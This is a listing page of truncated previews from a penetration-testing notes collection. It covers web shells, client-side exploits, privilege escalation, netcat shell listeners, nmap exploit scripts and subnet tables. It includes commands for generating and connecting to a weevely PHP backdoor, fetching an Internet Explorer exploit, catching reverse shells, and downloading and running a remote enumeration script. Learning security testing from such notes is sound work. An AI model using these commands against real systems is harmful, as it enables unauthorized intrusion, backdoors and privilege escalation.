Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.



Web Shag Web Application Vulnerability Assessment Platform
webshag-gui

Web Shells
http://tools.kali.org/maintaining-access/webshells
ls -l /usr/share/webshells/

Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t

...


Score: 0


Client Attacks

MS12-037- Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html http://www.exploit-db.com/download/24017
service apache2 start

JAVA Signed Jar client side attack
echo '' > /var/www/html/java.html
User must hit run on the popup that occurs.

Linux Client Shells
http://www....


Score: 0


Metasploit Meterpreter Privilege Escalation Guide https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/

Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:

whoami

net user "%username%"

Try the getsystem command using meterpreter - rarely works but is worth a try.

...


Score: 0


Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Try the obvious - Maybe the user is root or can sudo to root:
id
sudo su

Here are the commands I have learned to use to perform linux enumeration and privledge escal...


Score: 0


Post exploitation refers to the actions performed by an attacker, once some level of control has been gained on his target.

Simple Local Web Servers

Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80

Run a basic Python3 http server, great for serving up shells etc
...


Score: 0


Netcat Shell Listener

nc -nlvp 4444

Spawning a TTY Shell - Break out of Jail or limited shell You should almost always upgrade your shell after taking control of an apache or www user.

(For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )

(hint: sudo -l to s...


Score: 0




DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)

Nmap Fuzzers:

NMap Fuzzer List
https://nmap.org/nsedoc/categories/fuzzer.html

NMap HTTP Form Fuzzer
nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/regis...


Score: 0


File Enumeration

Find UID 0 files root execution

/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null

Get handy linux file system enumeration script (/var/tmp)
wget https://highon.coffee/downloads/linux-local-enum.sh chmod +x ./linux-local-enum.sh ./linux-lo...


Score: 0


Nmap Exploit Scripts
https://nmap.org/nsedoc/categories/exploit.html

Nmap search through vulnerability scripts
cd /usr/share/nmap/scripts/ ls -l \*vuln\*

Nmap search through Nmap Scripts for a specific keyword
ls /usr/share/nmap/scripts/\* | grep ftp

Scan for vulnerable exploits with nmap
nmap --script e...


Score: 0


Port Scanning
Subnet Reference Table
/ Addresses Hosts Netmask Amount of a Class C
/30 4 2 255.255.255.252 1/64
/29 8 6 255.255.255.248 1/32
/28 16 14 255.255.255.240 1/16
/27 32 30 255.255.255.224 1/8
/26 64 62 255.255.255.192 1/4
/25 128 126 255.255.255.128 1/2
/24 256 254 255.255.255.0 1
/23 512 51...


Score: 0